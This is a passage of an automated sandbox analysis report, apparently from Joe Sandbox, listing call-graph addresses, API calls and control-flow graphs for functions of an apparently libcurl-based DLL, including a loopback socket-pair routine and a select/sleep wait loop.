6b8e1e00 27375->27551 27378 6b8e30ca 27380 6b8e30ed 27378->27380 27381 6b8e1e00 74 API calls 27378->27381 27378->27406 27379 6b8e1e00 74 API calls 27379->27378 27382 6b8e1e00 74 API calls 27380->27382 27383 6b8e3110 27380->27383 27380->27406 27381->27380 27382->27383 27384 6b8e3295 27383->27384 27390 6b8e31fc 27383->27390 27383->27406 27384->27361 27386 6b8e3469 27384->27386 27385 6b8e3275 27387 6b8e1e50 2 API calls 27385->27387 27388 6b90e5d0 2 API calls 27386->27388 27389 6b8e327f 27387->27389 27407 6b8e3472 27388->27407 27392 6b91db71 __fassign 5 API calls 27389->27392 27390->27385 27582 6b8d1be0 7 API calls __fassign 27390->27582 27394 6b8e3291 27392->27394 27393 6b8e3235 27395 6b8e5230 curl_maprintf 27393->27395 27393->27406 27394->27330 27396 6b8e3248 27395->27396 27397 6b8e3265 27396->27397 27396->27406 27583 6b90f7a0 76 API calls 27397->27583 27399 6b8e3635 27401 6b8e36d8 27399->27401 27585 6b8d2200 6 API calls __fassign 27399->27585 27405 6b9006b0 74 API calls 27401->27405 27402 6b8e35b0 27402->27399 27415 6b8e35b7 27402->27415 27403 6b8e3542 27403->27399 27584 6b8e0d50 97 API calls 27403->27584 27405->27406 27406->27365 27407->27403 27408 6b8e1bd0 83 API calls 27407->27408 27408->27407 27409 6b8e3752 27588 6b8d1be0 7 API calls __fassign 27409->27588 27410 6b8e367a 27411 6b8e36c2 27410->27411 27586 6b8d2000 QueryPerformanceCounter GetTickCount 27410->27586 27411->27409 27587 6b8d20c0 QueryPerformanceCounter GetTickCount 27411->27587 27413 6b8e369c 27417 6b8e36b9 27413->27417 27418 6b8e36c7 27413->27418 27421 6b9006b0 74 API calls 27415->27421 27422 6b8e1bd0 83 API calls 27417->27422 27419 6b9006b0 74 API calls 27418->27419 27419->27401 27420 6b8e373e 27424 6b8e3749 27420->27424 27425 6b8e3823 27420->27425 27426 6b8e362d 27421->27426 27422->27411 27423 6b8e378d 27423->27426 27432 6b9006b0 74 API calls 27423->27432 27429 6b8e1bd0 83 API calls 27424->27429 27428 6b9006b0 74 API calls 27425->27428 27555 6b8e1e50 27426->27555 27427 6b8e3768 27427->27406 27427->27423 27430 6b9006b0 74 API calls 27427->27430 27428->27401 27429->27409 27430->27423 27432->27426 27433 6b8e37d4 27559 6b8e5230 27433->27559 27437 6b8e3808 27438 6b8e38ff 27437->27438 27439 6b8e3845 27437->27439 27441 6b8e3819 27437->27441 27440 6b8e8740 164 API calls 27438->27440 27438->27441 27439->27441 27577 6b8e8740 27439->27577 27444 6b8e3949 27440->27444 27441->27406 27442 6b8e39e3 27441->27442 27445 6b91db71 __fassign 5 API calls 27442->27445 27444->27441 27590 6b9005d0 74 API calls __fassign 27444->27590 27447 6b8e3a01 27445->27447 27447->27330 27448 6b8e38ae 27448->27441 27589 6b9005d0 74 API calls __fassign 27448->27589 27451 6b8e2924 27450->27451 27452 6b8e292d 27451->27452 27453 6b90e5d0 2 API calls 27451->27453 27452->27360 27454 6b8e29e9 27453->27454 27455 6b90e5d0 2 API calls 27454->27455 27456 6b8e29fc 27455->27456 27457 6b90e5d0 2 API calls 27456->27457 27459 6b8e2b82 27456->27459 27458 6b8e2bef 27457->27458 27458->27360 27459->27360 27461 6b8e4ab3 27460->27461 27591 6b8e5320 27461->27591 27463 6b8e4ac8 27464 6b8e4acf curl_url_dup 27463->27464 27465 6b8e4ae4 curl_url 27463->27465 27466 6b8e4aee 27464->27466 27465->27466 27467 6b8e4b53 27466->27467 27474 6b8e4ba3 27466->27474 27594 6b9105b0 47 API calls 27466->27594 27469 6b8e4c0e curl_url_get 27467->27469 27470 6b8e4b68 curl_url_set 27467->27470 27469->27474 27478 6b8e4c2a 27469->27478 27471 6b8e4bd2 curl_url_get 27470->27471 27470->27474 27472 6b8e4be7 27471->27472 27471->27474 27472->27469 27473 6b8e4c5e 27599 6b9005d0 74 API calls __fassign 27473->27599 27474->27368 27476 6b8e4b32 curl_maprintf 27476->27467 27476->27474 27477 6b8e4b14 27477->27467 27477->27476 27478->27473 27479 6b8e4c87 curl_url_get 27478->27479 27480 6b8e4cde 27479->27480 27481 6b8e4cb1 27479->27481 27480->27474 27483 6b8e4d04 curl_url_get 27480->27483 27595 6b8da3c0 47 API calls 27481->27595 27484 6b8e4d1c 27483->27484 27485 6b8e4d49 27483->27485 27596 6b8da3c0 47 API calls 27484->27596 27485->27474 27487 6b8e4d6b curl_url_get 27485->27487 27488 6b8e4d83 27487->27488 27488->27474 27489 6b8e4db1 curl_url_get 27488->27489 27490 6b8e4dc9 27489->27490 27491 6b8e4de0 curl_url_get 27489->27491 27490->27474 27490->27491 27491->27474 27492 6b8e4dfc curl_url_get 27491->27492 27493 6b8e4e37 27492->27493 27494 6b8e4e14 27492->27494 27597 6b9289b6 47 API calls 27493->27597 27496 6b8e4e5e curl_url_get 27494->27496 27497 6b8e4e2b 27494->27497 27496->27474 27498 6b8e4e7c 27496->27498 27497->27368 27498->27474 27598 6b8e5400 75 API calls __dosmaperr 27498->27598 27501 6b8e3a68 27500->27501 27502 6b8e3ace 27500->27502 27503 6b8e3aa3 27501->27503 27600 6b8da3c0 47 API calls 27501->27600 27504 6b8e3b17 27502->27504 27511 6b8e3aff 27502->27511 27532 6b8e3b0a 27502->27532 27503->27502 27503->27532 27601 6b8da3c0 47 API calls 27503->27601 27505 6b8e3b4d 27504->27505 27512 6b8e3b37 27504->27512 27508 6b8e3b56 curl_getenv 27505->27508 27531 6b8e3b94 ___from_strstr_to_strchr 27505->27531 27509 6b8e3b6e curl_getenv 27508->27509 27510 6b8e3b86 27508->27510 27509->27510 27509->27531 27513 6b9006b0 74 API calls 27510->27513 27602 6b9005d0 74 API calls __fassign 27511->27602 27603 6b9005d0 74 API calls __fassign 27512->27603 27513->27531 27516 6b8e3d5b curl_getenv 27518 6b8e3dd0 27516->27518 27526 6b8e3d8f 27516->27526 27519 6b8e3e0e 27518->27519 27520 6b8e3dda curl_getenv 27518->27520 27523 6b9006b0 74 API calls 27519->27523 27520->27519 27522 6b8e3df4 curl_getenv 27520->27522 27521 6b8e3e1c 27529 6b8e3e86 27521->27529 27605 6b8e4770 85 API calls 27521->27605 27522->27519 27522->27521 27523->27521 27524 6b91db71 __fassign 5 API calls 27525 6b8e2f71 27524->27525 27525->27369 27525->27371 27525->27406 27526->27518 27530 6b8e3db9 curl_getenv 27526->27530 27529->27532 27606 6b8e4770 85 API calls 27529->27606 27530->27518 27531->27516 27531->27521 27604 6b9294c5 47 API calls 27531->27604 27532->27524 27534 6b8e41b1 27533->27534 27540 6b8e3000 27534->27540 27542 6b8e4308 27534->27542 27607 6b8fa120 79 API calls 27534->27607 27535 6b8e43af 27539 6b8e43b3 curl_url_set 27535->27539 27535->27540 27536 6b8e431b curl_url_set 27536->27535 27536->27540 27538 6b8e42f0 27541 6b9006b0 74 API calls 27538->27541 27538->27542 27539->27540 27540->27361 27540->27406 27543 6b8e4590 27540->27543 27541->27542 27542->27535 27542->27536 27542->27540 27544 6b8e4750 27543->27544 27549 6b8e45a9 ___from_strstr_to_strchr 27543->27549 27544->27375 27545 6b8e45de curl_maprintf 27546 6b8e4759 27545->27546 27545->27549 27546->27375 27549->27544 27549->27545 27550 6b9006b0 74 API calls 27549->27550 27608 6b928962 47 API calls 27549->27608 27609 6b8e43e0 74 API calls ___from_strstr_to_strchr 27549->27609 27550->27549 27552 6b8e1e15 27551->27552 27554 6b8e1e2d 27551->27554 27553 6b9006b0 74 API calls 27552->27553 27552->27554 27553->27554 27554->27378 27554->27379 27554->27406 27556 6b8e1e60 27555->27556 27557 6b90e5d0 2 API calls 27556->27557 27558 6b8e1ec2 27556->27558 27557->27558 27558->27433 27560 6b8e5255 27559->27560 27561 6b8e37da 27560->27561 27562 6b8e5294 curl_maprintf 27560->27562 27561->27406 27563 6b8d3580 27561->27563 27562->27561 27564 6b8d35c1 27563->27564 27565 6b8d35f6 27564->27565 27566 6b8d35e1 27564->27566 27567 6b90e5d0 2 API calls 27565->27567 27570 6b8d3618 27565->27570 27568 6b91db71 __fassign 5 API calls 27566->27568 27567->27570 27569 6b8d35f2 27568->27569 27569->27437 27571 6b8d367e 27570->27571 27572 6b8d3668 27570->27572 27573 6b91db71 __fassign 5 API calls 27571->27573 27574 6b91db71 __fassign 5 API calls 27572->27574 27575 6b8d368f 27573->27575 27576 6b8d367a 27574->27576 27575->27437 27576->27437 27578 6b8e8752 27577->27578 27579 6b8e875a 27578->27579 27610 6b8e84a0 27578->27610 27579->27448 27581 6b8e8772 27581->27448 27582->27393 27583->27385 27584->27402 27585->27410 27586->27413 27587->27420 27588->27427 27589->27441 27590->27441 27592 6b8e5333 curl_url_cleanup 27591->27592 27592->27463 27594->27477 27595->27480 27596->27485 27597->27494 27598->27474 27599->27474 27600->27503 27601->27502 27602->27532 27603->27532 27604->27531 27605->27529 27606->27532 27607->27538 27608->27549 27609->27549 27611 6b8e84e7 27610->27611 27640 6b8e8840 27611->27640 27613 6b8e84ff 27614 6b9006b0 74 API calls 27613->27614 27631 6b8e8515 27613->27631 27614->27631 27615 6b8e8589 inet_pton 27617 6b8e859a 27615->27617 27618 6b8e85b9 inet_pton 27615->27618 27616 6b91db71 __fassign 5 API calls 27619 6b8e8679 27616->27619 27656 6b8d6fb0 htons __fassign 27617->27656 27621 6b8e85ca 27618->27621 27626 6b8e85d9 27618->27626 27619->27581 27657 6b8d6fb0 htons __fassign 27621->27657 27622 6b8e85a9 27622->27618 27624 6b8e867d 27622->27624 27661 6b8e7ae0 78 API calls __fassign 27624->27661 27625 6b8e86cf 27627 6b91db71 __fassign 5 API calls 27625->27627 27626->27624 27626->27625 27633 6b8e8617 27626->27633 27658 6b8fdb40 145 API calls ___scrt_fastfail 27626->27658 27629 6b8e86df 27627->27629 27629->27581 27630 6b8e8656 27630->27616 27631->27615 27631->27625 27631->27630 27633->27624 27634 6b8e8630 27633->27634 27634->27630 27635 6b8e864a 27634->27635 27636 6b8e8643 27634->27636 27660 6b8d1380 90 API calls 27635->27660 27659 6b8fdcd0 112 API calls 2 library calls 27636->27659 27639 6b8e8648 27639->27625 27639->27630 27662 6b8e87e0 48 API calls 27640->27662 27642 6b8e8873 27643 6b8e8997 27642->27643 27649 6b8e88e0 27642->27649 27663 6b9294c5 47 API calls 27642->27663 27645 6b91db71 __fassign 5 API calls 27643->27645 27648 6b8e89a6 27645->27648 27647 6b8e88b8 curl_msnprintf 27647->27649 27648->27613 27649->27643 27649->27649 27664 6b926edc 26 API calls 27649->27664 27650 6b8e8922 27650->27643 27651 6b8e8966 27650->27651 27652 6b9006b0 74 API calls 27651->27652 27653 6b8e8971 27652->27653 27654 6b91db71 __fassign 5 API calls 27653->27654 27655 6b8e8993 27654->27655 27655->27613 27656->27622 27657->27626 27658->27633 27659->27639 27660->27639 27661->27630 27662->27642 27663->27647 27664->27650 27941 6b8eb930 116 API calls ___from_strstr_to_strchr 27944 6b904050 115 API calls 27945 6b92dc55 28 API calls ___scrt_uninitialize_crt 27946 6b8da740 curl_easy_unescape 27947 6b8dc540 107 API calls 27948 6b8ef140 112 API calls 27949 6b8ea740 76 API calls 26649 6b91e65e 26650 6b91e66a ___scrt_is_nonwritable_in_current_image 26649->26650 26651 6b91e693 dllmain_raw 26650->26651 26656 6b91e68e 26650->26656 26657 6b91e679 26650->26657 26652 6b91e6ad dllmain_crt_dispatch 26651->26652 26651->26657 26652->26656 26652->26657 26653 6b91e6fa 26654 6b91e703 dllmain_crt_dispatch 26653->26654 26653->26657 26655 6b91e716 dllmain_raw 26654->26655 26654->26657 26655->26657 26656->26653 26658 6b91e6e6 dllmain_crt_dispatch dllmain_raw 26656->26658 26658->26653 27950 6b910a40 52 API calls __fassign 27039 6b8d1050 27040 6b8d107b 27039->27040 27043 6b8d108f 27039->27043 27042 6b8e8a20 2 API calls 27040->27042 27041 6b90e5d0 2 API calls 27046 6b8d10c6 ___scrt_fastfail 27041->27046 27042->27043 27043->27041 27044 6b8d118c 27086 6b921f49 14 API calls __dosmaperr 27044->27086 27046->27044 27050 6b8d1158 InitializeCriticalSectionEx 27046->27050 27051 6b8d1179 27046->27051 27047 6b8d11a7 27087 6b9005d0 74 API calls __fassign 27047->27087 27049 6b8d11b9 27062 6b906d50 socket 27050->27062 27085 6b8d1670 DeleteCriticalSection closesocket ___scrt_fastfail 27051->27085 27054 6b8d1172 27054->27051 27055 6b8d11df 27054->27055 27056 6b8d122d 27055->27056 27082 6b8d9120 27055->27082 27089 6b8d15c0 8 API calls 27056->27089 27060 6b8d1240 27063 6b906f21 27062->27063 27064 6b906d8d htonl setsockopt 27062->27064 27065 6b91db71 __fassign 5 API calls 27063->27065 27066 6b906ddc bind 27064->27066 27067 6b906f0f closesocket closesocket closesocket 27064->27067 27068 6b906f31 27065->27068 27066->27067 27069 6b906df2 getsockname 27066->27069 27067->27063 27068->27054 27069->27067 27070 6b906e0a listen 27069->27070 27070->27067 27071 6b906e1c socket 27070->27071 27071->27067 27072 6b906e2f connect 27071->27072 27072->27067 27073 6b906e45 accept 27072->27073 27073->27067 27074 6b906e5c curl_msnprintf 27073->27074 27075 6b906e76 27074->27075 27075->27075 27076 6b906e7d send 27075->27076 27076->27067 27077 6b906e92 recv 27076->27077 27077->27067 27081 6b906ea7 27077->27081 27078 6b906ef5 closesocket 27079 6b91db71 __fassign 5 API calls 27078->27079 27080 6b906f0b 27079->27080 27080->27054 27081->27067 27081->27078 27090 6b928360 27082->27090 27084 6b8d1218 27084->27060 27088 6b921f49 14 API calls __dosmaperr 27084->27088 27085->27044 27086->27047 27087->27049 27088->27056 27089->27044 27091 6b928381 27090->27091 27092 6b92836d 27090->27092 27105 6b928310 27091->27105 27114 6b921f49 14 API calls __dosmaperr 27092->27114 27096 6b928372 27115 6b92f18d 25 API calls __fassign 27096->27115 27098 6b928396 CreateThread 27100 6b9283c1 27098->27100 27101 6b9283b5 GetLastError 27098->27101 27099 6b92837d 27099->27084 27117 6b928282 27100->27117 27116 6b921f13 14 API calls __dosmaperr 27101->27116 27106 6b92f78d __dosmaperr 14 API calls 27105->27106 27107 6b928321 27106->27107 27108 6b92f7ea _free 14 API calls 27107->27108 27109 6b92832e 27108->27109 27110 6b928352 27109->27110 27111 6b928335 GetModuleHandleExW 27109->27111 27112 6b928282 16 API calls 27110->27112 27111->27110 27113 6b92835a 27112->27113 27113->27098 27113->27100 27114->27096 27115->27099 27116->27100 27118 6b92828e 27117->27118 27124 6b9282b2 27117->27124 27119 6b928294 CloseHandle 27118->27119 27120 6b92829d 27118->27120 27119->27120 27121 6b9282a3 FreeLibrary 27120->27121 27122 6b9282ac 27120->27122 27121->27122 27123 6b92f7ea _free 14 API calls 27122->27123 27123->27124 27124->27084 27952 6b8da150 FreeLibrary FreeLibrary WSACleanup 27954 6b8d4850 74 API calls 27955 6b8dac50 30 API calls 27957 6b912170 6 API calls __fassign 27958 6b8d1260 76 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 27963 6b8f2160 CryptAcquireContextA CryptCreateHash 27964 6b8f3760 51 API calls 2 library calls 27965 6b904160 108 API calls 27125 6b8d9870 27126 6b8d9879 27125->27126 27127 6b8d9882 27125->27127 27128 6b8e1650 106 API calls 27126->27128 27128->27127 27966 6b8d7f70 7 API calls 27967 6b8dbc70 96 API calls 2 library calls 27665 6b91e46f 27666 6b91e47a 27665->27666 27667 6b91e4ad dllmain_crt_process_detach 27665->27667 27668 6b91e49f dllmain_crt_process_attach 27666->27668 27669 6b91e47f 27666->27669 27673 6b91e489 27667->27673 27668->27673 27670 6b91e495 27669->27670 27672 6b91e484 27669->27672 27680 6b91e934 23 API calls 27670->27680 27672->27673 27675 6b91e953 27672->27675 27681 6b92cd9f 27675->27681 27679 6b91e95d 27679->27673 27680->27673 27685 6b92f50f 27681->27685 27684 6b92032a 21 API calls __freeptd 27684->27679 27686 6b92f519 27685->27686 27689 6b91e958 27685->27689 27693 6b92fb50 6 API calls __dosmaperr 27686->27693 27688 6b92f520 27688->27689 27690 6b92fb8f __dosmaperr 6 API calls 27688->27690 27689->27684 27691 6b92f533 27690->27691 27694 6b92f3d6 27691->27694 27693->27688 27695 6b92f3e1 27694->27695 27699 6b92f3f1 27694->27699 27700 6b92f3f7 27695->27700 27698 6b92f7ea _free 14 API calls 27698->27699 27699->27689 27701 6b92f412 27700->27701 27702 6b92f40c 27700->27702 27704 6b92f7ea _free 14 API calls 27701->27704 27703 6b92f7ea _free 14 API calls 27702->27703 27703->27701 27705 6b92f41e 27704->27705 27706 6b92f7ea _free 14 API calls 27705->27706 27707 6b92f429 27706->27707 27708 6b92f7ea _free 14 API calls 27707->27708 27709 6b92f434 27708->27709 27710 6b92f7ea _free 14 API calls 27709->27710 27711 6b92f43f 27710->27711 27712 6b92f7ea _free 14 API calls 27711->27712 27713 6b92f44a 27712->27713 27714 6b92f7ea _free 14 API calls 27713->27714 27715 6b92f455 27714->27715 27716 6b92f7ea _free 14 API calls 27715->27716 27717 6b92f460 27716->27717 27718 6b92f7ea _free 14 API calls 27717->27718 27719 6b92f46b 27718->27719 27720 6b92f7ea _free 14 API calls 27719->27720 27721 6b92f479 27720->27721 27726 6b92f223 27721->27726 27727 6b92f22f ___scrt_is_nonwritable_in_current_image 27726->27727 27742 6b932dc8 EnterCriticalSection 27727->27742 27730 6b92f239 27732 6b92f7ea _free 14 API calls 27730->27732 27733 6b92f263 27730->27733 27732->27733 27743 6b92f282 27733->27743 27734 6b92f28e 27735 6b92f29a ___scrt_is_nonwritable_in_current_image 27734->27735 27747 6b932dc8 EnterCriticalSection 27735->27747 27737 6b92f2a4 27748 6b92f4c4 27737->27748 27739 6b92f2b7 27752 6b92f2d7 27739->27752 27742->27730 27746 6b932e10 LeaveCriticalSection 27743->27746 27745 6b92f270 27745->27734 27746->27745 27747->27737 27749 6b92f4d3 __fassign 27748->27749 27751 6b92f4fa __fassign 27748->27751 27749->27751 27755 6b935193 14 API calls 2 library calls 27749->27755 27751->27739 27756 6b932e10 LeaveCriticalSection 27752->27756 27754 6b92f2c5 27754->27698 27755->27751 27756->27754 27839 6b8f7d70 27840 6b90e5d0 2 API calls 27839->27840 27842 6b8f7d97 27840->27842 27841 6b8f7e5c 27843 6b91db71 __fassign 5 API calls 27841->27843 27842->27841 27844 6b8f7db5 27842->27844 27845 6b8f7e6e 27843->27845 27846 6b8f7dbd 27844->27846 27847 6b8f7dd1 27844->27847 27848 6b91db71 __fassign 5 API calls 27846->27848 27852 6b8f7df1 27847->27852 27859 6b8f88f0 27847->27859 27851 6b8f7dcd 27848->27851 27853 6b8f7e34 27852->27853 27870 6b909490 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 27852->27870 27871 6b8f7680 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 27852->27871 27855 6b8f7e46 27853->27855 27872 6b8f7580 7 API calls 27853->27872 27857 6b91db71 __fassign 5 API calls 27855->27857 27858 6b8f7e58 27857->27858 27860 6b8f9a08 27859->27860 27867 6b8f8912 27859->27867 27860->27847 27861 6b8d3580 7 API calls 27861->27867 27862 6b8f69d0 76 API calls 27862->27867 27864 6b8f991d curl_pushheader_bynum 27864->27867 27865 6b9005d0 74 API calls 27865->27867 27867->27860 27867->27861 27867->27862 27867->27864 27867->27865 27868 6b8e1bd0 83 API calls 27867->27868 27869 6b8f83d0 138 API calls 27867->27869 27873 6b8f6cb0 74 API calls 27867->27873 27874 6b8fcd80 93 API calls 27867->27874 27868->27867 27869->27867 27870->27852 27871->27852 27872->27855 27873->27867 27874->27867 27968 6b8f7c70 110 API calls

                                                                                                                                  Executed Functions

                                                                                                                                  Function 6B906D50 Relevance: 24.2, APIs: 16, Instructions: 171networkCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 134 6b906d50-6b906d87 socket 135 6b906f21-6b906f34 call 6b91db71 134->135 136 6b906d8d-6b906dd6 htonl setsockopt 134->136 138 6b906ddc-6b906dec bind 136->138 139 6b906f0f-6b906f1f closesocket * 3 136->139 138->139 141 6b906df2-6b906e04 getsockname 138->141 139->135 141->139 142 6b906e0a-6b906e16 listen 141->142 142->139 143 6b906e1c-6b906e29 socket 142->143 143->139 144 6b906e2f-6b906e3f connect 143->144 144->139 145 6b906e45-6b906e56 accept 144->145 145->139 146 6b906e5c-6b906e73 curl_msnprintf 145->146 147 6b906e76-6b906e7b 146->147 147->147 148 6b906e7d-6b906e90 send 147->148 148->139 149 6b906e92-6b906ea5 recv 148->149 149->139 150 6b906ea7-6b906eb0 149->150 151 6b906eb2-6b906eb6 150->151 152 6b906ec3-6b906ec6 150->152 153 6b906ec8-6b906ecc 151->153 154 6b906eb8-6b906ec1 151->154 152->153 155 6b906ef5-6b906f0e closesocket call 6b91db71 152->155 153->139 156 6b906ece-6b906ed1 153->156 154->151 154->152 156->155 158 6b906ed3-6b906ed9 156->158 158->139 160 6b906edb-6b906ede 158->160 160->155 161 6b906ee0-6b906ee6 160->161 161->139 162 6b906ee8-6b906eeb 161->162 162->155 163 6b906eed-6b906ef3 162->163 163->139 163->155
                                                                                                                                  APIs
                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 6B906D80
                                                                                                                                  • htonl.WS2_32(7F000001), ref: 6B906DA3
                                                                                                                                  • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 6B906DCD
                                                                                                                                  • bind.WS2_32(00000000,?,00000010), ref: 6B906DE3
                                                                                                                                  • getsockname.WS2_32(00000000,?,00000010), ref: 6B906DFB
                                                                                                                                  • listen.WS2_32(00000000,00000001), ref: 6B906E0D
                                                                                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 6B906E22
                                                                                                                                  • connect.WS2_32(00000000,?,00000010), ref: 6B906E36
                                                                                                                                  • accept.WS2_32(00000000,00000000,00000000), ref: 6B906E4A
                                                                                                                                  • curl_msnprintf.LIBCURL(?,0000000C,6B940CA0,6B8D1172), ref: 6B906E68
                                                                                                                                  • send.WS2_32(6B8D1172,?,?,00000000), ref: 6B906E88
                                                                                                                                  • recv.WS2_32(C74C79C0,00000001,0000000C,00000000), ref: 6B906E9D
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 6B906EF6
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 6B906F16
                                                                                                                                  • closesocket.WS2_32(6B8D1172), ref: 6B906F1A
                                                                                                                                  • closesocket.WS2_32(C74C79C0), ref: 6B906F1F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: closesocket$socket$acceptbindconnectcurl_msnprintfgetsocknamehtonllistenrecvsendsetsockopt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4135244658-0
                                                                                                                                  • Opcode ID: e3847561f87b6e087068377100dd8c6ddeade52681c0ea59069f12b504c7311f
                                                                                                                                  • Instruction ID: 0d3396fbe07ac2ce3c8038bb8e824da9f85bd99b668d525327a635305353a943
                                                                                                                                  • Opcode Fuzzy Hash: e3847561f87b6e087068377100dd8c6ddeade52681c0ea59069f12b504c7311f
                                                                                                                                  • Instruction Fuzzy Hash: 0B51D731904118ABDB209F78CC85BBD7B79AF16334F2043A9E975AA1D0DB75D886CB60
                                                                                                                                  Function 6B8FFEF0 Relevance: 15.3, APIs: 10, Instructions: 347networksleepCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 471 6b8ffef0-6b8fff0e 472 6b8fff2b-6b8fff35 471->472 473 6b8fff10-6b8fff17 471->473 475 6b900384-6b900393 call 6b91db71 472->475 476 6b8fff3b-6b8fff3d 472->476 473->472 474 6b8fff19 473->474 477 6b8fff20-6b8fff24 474->477 478 6b8fff43 476->478 479 6b90036e-6b900373 476->479 481 6b8fff69-6b8fff98 477->481 482 6b8fff26-6b8fff29 477->482 483 6b8fff4d-6b8fff68 WSASetLastError call 6b91db71 478->483 484 6b8fff45-6b8fff47 478->484 485 6b90037d-6b90037e Sleep 479->485 489 6b8fffa0-6b8fffbf 481->489 482->472 482->477 484->483 487 6b900363-6b900365 484->487 485->475 487->485 490 6b900367 487->490 492 6b9000c4-6b9000d3 489->492 493 6b8fffc5 489->493 490->479 494 6b900369-6b90036c 490->494 492->489 495 6b9000d9-6b9000db 492->495 496 6b900100-6b90010b WSASetLastError 493->496 497 6b8fffcb-6b8fffed 493->497 494->479 494->485 501 6b9000e1-6b9000e3 495->501 502 6b900164-6b900178 495->502 500 6b90010e-6b90011e call 6b91db71 496->500 498 6b9000c1 497->498 499 6b8ffff3-6b90000d 497->499 498->492 503 6b900046-6b900048 499->503 504 6b90000f-6b900013 499->504 501->502 506 6b9000e5-6b9000e7 501->506 507 6b9001a1-6b9001e1 call 6b91db90 call 6b91e290 * 2 502->507 508 6b90017a 502->508 513 6b900081-6b900086 503->513 514 6b90004a-6b90004e 503->514 509 6b900023-6b900025 504->509 510 6b900015-6b90001c 504->510 506->502 515 6b9000e9-6b9000f9 506->515 564 6b9001e3 507->564 565 6b90020f 507->565 516 6b900180-6b90018a 508->516 517 6b90017c-6b90017e 508->517 522 6b900040 509->522 523 6b900027-6b90002a 509->523 510->509 521 6b90001e-6b900021 510->521 513->498 519 6b900088-6b90008c 513->519 525 6b900050-6b900057 514->525 526 6b90005e-6b900060 514->526 527 6b9000fb 515->527 528 6b90011f-6b900121 515->528 520 6b900237-6b900271 select 516->520 517->516 518 6b90018f-6b900191 517->518 530 6b900223-6b90022d 518->530 531 6b900197 518->531 532 6b90009e-6b9000a0 519->532 533 6b90008e 519->533 529 6b900277-6b900279 520->529 521->509 521->510 522->503 523->522 536 6b90002c-6b90003a 523->536 525->526 538 6b900059-6b90005c 525->538 539 6b900062-6b900065 526->539 540 6b90007b 526->540 527->529 534 6b900123 528->534 535 6b900147-6b90014c 528->535 529->500 541 6b90027f-6b90028a 529->541 530->520 531->507 542 6b900199-6b90019b 531->542 544 6b9000a2-6b9000a5 532->544 545 6b9000bb 532->545 543 6b900090-6b900097 533->543 546 6b900125-6b900127 534->546 547 6b900129-6b900137 WSASetLastError 534->547 549 6b900156-6b90015f Sleep 535->549 536->522 538->525 538->526 539->540 550 6b900067-6b900075 539->550 540->513 551 6b900290-6b90029b 541->551 542->507 542->530 543->532 552 6b900099-6b90009c 543->552 544->545 553 6b9000a7-6b9000b5 544->553 545->498 546->547 554 6b90013c-6b90013e 546->554 547->529 549->529 550->540 556 6b9002a1-6b9002b0 __WSAFDIsSet 551->556 557 6b900343-6b90034a 551->557 552->532 552->543 553->545 554->549 558 6b900140 554->558 561 6b9002b2-6b9002bf 556->561 562 6b9002df-6b9002f0 __WSAFDIsSet 556->562 557->551 560 6b900350-6b900362 call 6b91db71 557->560 558->535 563 6b900142-6b900145 558->563 567 6b9002c1-6b9002c9 561->567 568 6b9002cc-6b9002d5 561->568 569 6b9002f2-6b9002f6 562->569 570 6b9002fc-6b90030d __WSAFDIsSet 562->570 563->535 563->549 571 6b9001f2-6b90020d 564->571 572 6b9001e5-6b9001f0 564->572 573 6b900215-6b900221 565->573 567->568 568->562 575 6b9002d7-6b9002dc 568->575 569->570 576 6b9002f8 569->576 577 6b90033c-6b900340 570->577 578 6b90030f-6b90031c 570->578 571->520 572->571 572->573 573->520 575->562 576->570 577->557 579 6b900342 577->579 580 6b900329-6b900332 578->580 581 6b90031e-6b900326 578->581 579->557 580->577 582 6b900334-6b900339 580->582 581->580 582->577
                                                                                                                                  APIs
                                                                                                                                  • WSASetLastError.WS2_32(00002726), ref: 6B8FFF52
                                                                                                                                  • WSASetLastError.WS2_32(00002726,00000000,00000001,000000FF), ref: 6B900105
                                                                                                                                  • WSASetLastError.WS2_32(00002726,00000000,00000001,000000FF), ref: 6B90012E
                                                                                                                                  • Sleep.KERNEL32(FFFFFFFE,00000000,00000001,000000FF), ref: 6B900157
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B9001AA
                                                                                                                                  • select.WS2_32(?,?,?,?,?), ref: 6B900271
                                                                                                                                  • __WSAFDIsSet.WS2_32(?,?), ref: 6B9002A9
                                                                                                                                  • __WSAFDIsSet.WS2_32(?,?), ref: 6B9002E9
                                                                                                                                  • __WSAFDIsSet.WS2_32(?,?), ref: 6B900306
                                                                                                                                  • Sleep.KERNEL32(FFFFFFFE), ref: 6B90037E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
